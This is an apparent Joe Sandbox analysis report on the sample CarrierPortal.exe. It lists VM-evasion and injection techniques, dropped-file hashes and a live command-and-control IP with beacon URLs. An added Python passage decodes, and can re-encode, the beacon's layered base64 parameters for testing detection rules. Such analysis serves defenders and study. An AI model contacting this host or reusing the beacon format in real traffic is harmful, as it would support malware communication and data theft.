Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.3271.cat VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\System32\RuntimeBroker.exe VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\SquareLogo44x44.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-100.png VolumeInformation
Source: C:\Windows\System32\Taskmgr.exeQueries volume information: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Assets\SquareLogo44x44.scale-100.png VolumeInformation
Source: C:\Users\user\Desktop\CarrierPortal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix (only techniques that carry a signature-count badge in the report's matrix are listed; the badge number is reproduced as extracted)

Reconnaissance: none
Resource Development: none
Initial Access: none
Execution: Windows Management Instrumentation (231); Command and Scripting Interpreter (2)
Persistence: LSASS Driver (1); DLL Side-Loading (1)
Privilege Escalation: Process Injection (11); LSASS Driver (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
Credential Access: Input Capture (1)
Discovery: Query Registry (1); Security Software Discovery (331); Process Discovery (1); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (133)
Lateral Movement: none
Collection: Input Capture (1); Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (1)
Exfiltration: none
Impact: none
Behavior Graph (ID: 1584233; Sample: CarrierPortal.exe; Start date: 04/01/2025; Architecture: WINDOWS; Score: 45)

Start
  CarrierPortal.exe
    -> 162.243.76.72 (ports 49713, 49748, 80; DIGITALOCEAN-ASNUS, United States)
    cmd.exe
      dxdiag.exe
        [signature] Query firmware table information (likely to detect VMs)
        [signature] Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        [signature] Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
      conhost.exe
  powershell.exe
    [signature] Loading BitLocker PowerShell Module
    CarrierPortal.exe
      cmd.exe
        dxdiag.exe
          [signature] Query firmware table information (likely to detect VMs)
        conhost.exe
    conhost.exe
  Taskmgr.exe
    [signature] Monitors registry run keys for changes
  3 other processes

Antivirus detection

Source | Detection | Scanner | Label
CarrierPortal.exe | 0% | ReversingLabs |
CarrierPortal.exe | 0% | Virustotal |
No Antivirus matches
URL detection

Source | Detection | Scanner | Label
http://go.mtH | 0% | Avira URL Cloud | safe
https://www.graalvm.org/dev/reference-manual/native-image/dynamic-features/CertificateManagement/#ru | 0% | Avira URL Cloud | safe
https://www.graalvm.org/ | 0% | Avira URL Cloud | safe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle | 0% | Avira URL Cloud | safe
http://www.quovadis.bmB | 0% | Avira URL Cloud | safe
http://cps.chambersign.org/cps/chambersroot.html)_ | 0% | Avira URL Cloud | safe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#serialization | 0% | Avira URL Cloud | safe
https://ocsp.quovadisoffshore.com9 | 0% | Avira URL Cloud | safe
http://policy.camerfirma.com3b | 0% | Avira URL Cloud | safe
https://repository.luxtrust.lu# | 0% | Avira URL Cloud | safe
http://162.243.76.72/signin.php | 0% | Avira URL Cloud | safe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#g | 0% | Avira URL Cloud | safe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/# | 0% | Avira URL Cloud | safe
http://go.microsoft.c7H | 0% | Avira URL Cloud | safe
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=… (remainder of the URL and the detection value are not recoverable from the page) | | Avira URL Cloud | safe
https://ocsp.quovadisoffshore.com( | 0% | Avira URL Cloud | safe
http://repository.swisssign.com/YF | 0% | Avira URL Cloud | safe
http://go.microsoft.co | 0% | Avira URL Cloud | safe
http://162.243.76.72/signin.php? | 0% | Avira URL Cloud | safe
https://repository.luxtrust.luc | 0% | Avira URL Cloud | safe
https://repository.luxtrust.luYa | 0% | Avira URL Cloud | safe
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1Z | 0% | Avira URL Cloud | safe
http://162.243.76.72/signin.php?form=form&post= | 0% | Avira URL Cloud | safe
http://cps.chambersign.org/cps/chambersroot.htmlax | 0% | Avira URL Cloud | safe
No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=… (remainder of the URL is not recoverable from the page) | | Avira URL Cloud: safe | unknown
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.quovadis.bmB | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.securetrust.com/STCA.crlE | CarrierPortal.exe | false | | high
http://go.mtH | Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.graalvm.org/ | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
http://cps.chambersign.org/cps/chambersroot.html)_ | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.chambersign.org/chambersroot.crl0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://www.graalvm.org/dev/reference-manual/native-image/dynamic-features/CertificateManagement/#ru | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#serialization | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
https://repository.luxtrust.lu0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://ocsp.quovadisoffshore.com9 | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
http://cps.chambersign.org/cps/chambersroot.html0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://crl.dhimyotis.com/certignarootca.crl0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://policy.camerfirma.com3b | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
http://www.chambersign.org1 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://repository.swisssign.com/0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://policy.camerfirma.com | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://repository.luxtrust.lu# | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://162.243.76.72/signin.php | CarrierPortal.exe, CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ocsp.quovadisoffshore.com | CarrierPortal.exe | false | | high
http://crl.securetrust.com/STCA.crl0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#g | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
https://repository.luxtrust.lu | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://www.quovadisglobal.com/cps0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://repository.swisssign.com/YF | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.dhimyotis.com/certignarootca.crl | CarrierPortal.exe | false | | high
http://go.microsoft.c7H | Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ocsp.quovadisoffshore.com0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://www.graalvm.org/latest/reference-manual/native-image/metadata/# | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
http://repository.swisssign.com/ | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://www.chambersign.org | CarrierPortal.exe | false | | high
http://policy.camerfirma.com0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://ocsp.quovadisoffshore.com( | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://go.microsoft.co | Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.certigna.fr/certignarootca.crl | CarrierPortal.exe | false | | high
http://crl.xrampsecurity.com/XGCA.crl | CarrierPortal.exe | false | | high
http://crl.securetrust.com/STCA.crl;_ | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://wwww.certigna.fr/autorites/0m | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://162.243.76.72/signin.php? | CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wwww.certigna.fr/autorites/ | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://repository.luxtrust.luc | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quovadisglobal.com/cps | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://cps.chambersign.org/cps/chambersroot.html | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://crl.securetrust.com/STCA.crl | CarrierPortal.exe | false | | high
http://cps.chambersign.org/cps/chambersroot.htmlax | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.xrampsecurity.com/XGCA.crl0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://crl.certigna.fr/certignarootca.crl01 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://crl.dhimyotis.com/certignarootca.crllW | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://repository.luxtrust.luYa | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://www.quovadis.bm | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://www.quovadis.bm0 | CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmp | false | | high
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1Z | CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://162.243.76.72/signin.php?form=form&post= | CarrierPortal.exe | false | Avira URL Cloud: safe | unknown
http://crl.chambersign.org/chambersroot.crl | CarrierPortal.exe | false | | high
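The beacon URL recorded above, http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1Z, carries its parameters as base64 text. Inspecting the post= value shows a two-layer scheme: base64-decoding it yields a string that is itself base64 written backwards, and reversing and decoding once more gives the ASCII string Installer1. The data= value is cut off in the report, so its content cannot be recovered. The following Python is an added example written for this page, not code from Joe Sandbox or from the sample: the layered encoding is inferred from the recorded value and is not documented anywhere in the report, the function names are this example's own, and the URL is embedded exactly as the report shows it. The code parses the recorded URL, undoes both layers where a value is complete, and reports a value that is not decodable or is truncated as undecoded instead of guessing a plaintext.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Beacon URL exactly as recorded in the report. The data= value is cut off on
# the page, so the parser has to cope with an incomplete token.
OBSERVED_URL = (
    "http://162.243.76.72/signin.php?form=form"
    "&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D"
    "&data=PW93VktSa1l4QVhNU1Z"
)


def _b64decode(token: str) -> bytes:
    """Strict base64 decode that only tolerates stripped '=' padding."""
    token = token.strip()
    token += "=" * ((-len(token)) % 4)
    return base64.b64decode(token, validate=True)


def decode_layered(token: str) -> str:
    """Undo base64(reverse(base64(plaintext))) and return the plaintext.

    Assumption (inferred from the recorded post= value, not stated by the
    report): the outer base64 layer wraps the reversed base64 of the plaintext.
    Raises ValueError (binascii.Error is a subclass) or UnicodeDecodeError when
    a layer is not valid base64 or does not decode to text.
    """
    inner = _b64decode(token).decode("ascii")
    return _b64decode(inner[::-1]).decode("utf-8")


def encode_layered(plaintext: str) -> str:
    """Inverse of decode_layered; useful for building test beacons for a detector."""
    inner = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return base64.b64encode(inner[::-1].encode("ascii")).decode("ascii")


def parse_beacon(url: str) -> dict:
    """Return {param: {"raw": str, "decoded": str | None}} for every query parameter.

    A value that is not a complete two-layer token (the truncated data= capture,
    or the literal word "form") is reported with decoded=None rather than a
    guessed plaintext.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    result = {}
    for name, values in params.items():
        raw = values[0]  # parse_qs already applies %XX unquoting (%3D -> '=')
        try:
            decoded = decode_layered(raw) if raw else None
        except (ValueError, UnicodeDecodeError):
            decoded = None  # not decodable: junk, wrong layering, or truncated
        result[name] = {"raw": raw, "decoded": decoded}
    return result


if __name__ == "__main__":
    for name, info in parse_beacon(OBSERVED_URL).items():
        print(f"{name}: raw={info['raw']!r} decoded={info['decoded']!r}")
```

Because the inner layer is reversed before the outer encoding, a token truncated at its end (as data= is here) loses the start of the inner base64 string, so nothing of the plaintext can be recovered from it; the parser therefore returns None for that field rather than a partial decode. The encoder is included so a detection team can generate complete sample beacons for testing a URL-pattern rule without reusing the captured data= value.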
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
162.243.76.72 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1584233
                                                                  Start date and time:2025-01-04 23:06:55 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 15s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of new started processes analysed:25
                                                                  Number of new started drivers analysed:2
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:CarrierPortal.exe
                                                                  Detection:MAL
                                                                  Classification:mal45.evad.winEXE@17/17@0/1
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 2
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.56.254.164, 172.202.163.200, 204.79.197.200, 23.1.33.206, 51.104.15.253, 204.79.197.222, 150.171.84.254, 13.107.213.254
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fp.msedge.net, p-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com, t-ring.msedge.net, browser.pipe.aria.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target CarrierPortal.exe, PID 1092 because there are no executed functions
                                                                  • Execution Graph export aborted for target CarrierPortal.exe, PID 3012 because there are no executed functions
                                                                  • Not all processes were analyzed; the report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  Time: 17:08:00  Type: API Interceptor  Description: 44x Sleep call for process: powershell.exe modified
                                                                  No context
                                                                  No context
                                                                  Match: DIGITALOCEAN-ASNUS (associated samples / URLs seen from this ASN)
                                                                  • Sample: 1.elf  Detection: malicious  Threat Name: Unknown  Context: 157.230.220.254
                                                                  • Sample: 1.elf  Detection: malicious  Threat Name: Unknown  Context: 157.245.145.61
                                                                  • Sample: fuckunix.spc.elf  Detection: malicious  Threat Name: Mirai  Context: 104.131.84.158
                                                                  • Sample: i686.elf  Detection: malicious  Threat Name: Mirai  Context: 188.166.182.194
                                                                  • Sample: 2.elf  Detection: malicious  Threat Name: Unknown  Context: 157.245.169.28
                                                                  • Sample: 3.elf  Detection: malicious  Threat Name: Unknown  Context: 157.245.169.73
                                                                  • Sample: 2.elf  Detection: malicious  Threat Name: Unknown  Context: 157.245.145.71
                                                                  • Sample: 1.elf  Detection: malicious  Threat Name: Unknown  Context: 157.230.180.175
                                                                  • URL: http://www.klim.com  Detection: malicious  Threat Name: Unknown  Context: 159.89.102.253
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\System32\Taskmgr.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:modified
                                                                  Size (bytes):4
                                                                  Entropy (8bit):1.5
                                                                  Encrypted:false
                                                                  SSDEEP:3:R:R
                                                                  MD5:F49655F856ACB8884CC0ACE29216F511
                                                                  SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                  SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                  SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                  Malicious:false
                                                                  Preview:EERF
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):65552
                                                                  Entropy (8bit):0.012588069182000032
                                                                  Encrypted:false
                                                                  SSDEEP:3:63qIllGlll/l/lXp9ZjrPBY06llcllXgvZP:63qIl0dPBY0O6/O
                                                                  MD5:7A0F107CC175B4CA3EDB21F3953CB3E9
                                                                  SHA1:7B64025EA33E429362475759AEB787CE8D3E101C
                                                                  SHA-256:27F484DE82D7E1A41A5DC67D0AE827C8407C07FFDF1DEF1D61BB114E825F74E0
                                                                  SHA-512:732FBF07C8C32F122E3DB2DEC40B727F9C1669F5103A741E56699C042530628755BDDC62E8F84B6321E2818F2080C17CF5FB0AE59C7701670491284C252C4BCB
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):1.5
                                                                  Encrypted:false
                                                                  SSDEEP:3:R:R
                                                                  MD5:F49655F856ACB8884CC0ACE29216F511
                                                                  SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                  SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                  SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                  Malicious:false
                                                                  Preview:EERF
                                                                  Process:C:\Windows\System32\dxdiag.exe
                                                                  File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.020482262885854904
                                                                  Encrypted:false
                                                                  SSDEEP:3:9llpl5d2DJqojBdl+Sli5lWyyHk15lRlTNlktt/llaia9sVQMm6En:c9q0Bn+SkSJkJNetb2Hrn
                                                                  MD5:27C5B2CF8CC33DE010AE37B1B8B0E715
                                                                  SHA1:F4B312BFCF51C533CA43AC8A5302450A906159AA
                                                                  SHA-256:2EB0A2FD1624CFD6E21CF4121E8C44071EEAAA94FC1B0B9A39B23B571D58D40F
                                                                  SHA-512:0ECF3D1E0FE3C336C5A12A01D0F960E605A3B1422ED1FE38C16BC959027890E91BC91C0DA70115ADDCFD4681112E8E20C6EAB68C2BF41F731CF97B05656B24DA
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):61426
                                                                  Entropy (8bit):5.07948872134001
                                                                  Encrypted:false
                                                                  SSDEEP:1536:eA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdx7YWfSb7OdBYNPzqtAHki:t1+z30n1bV3CNBQkj2UqiUqaVLflJnP8
                                                                  MD5:6AAF3527C80775C9128AE5B7BC0ECB4F
                                                                  SHA1:7EEF74B516BD09A29E6AECA628B76863768EEDED
                                                                  SHA-256:80812FF347086EDF15401EA1B2AC96881633B4F0FC1D2C7D3B443821770562E3
                                                                  SHA-512:58D78A85601CB830F87A6B0496BD001FA469F4B66AFAC99543C1E2021E82A819DAEE482F8F296512788B857508008708DF49427123DB775D684AE1C2F1A0A1BB
                                                                  Malicious:false
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
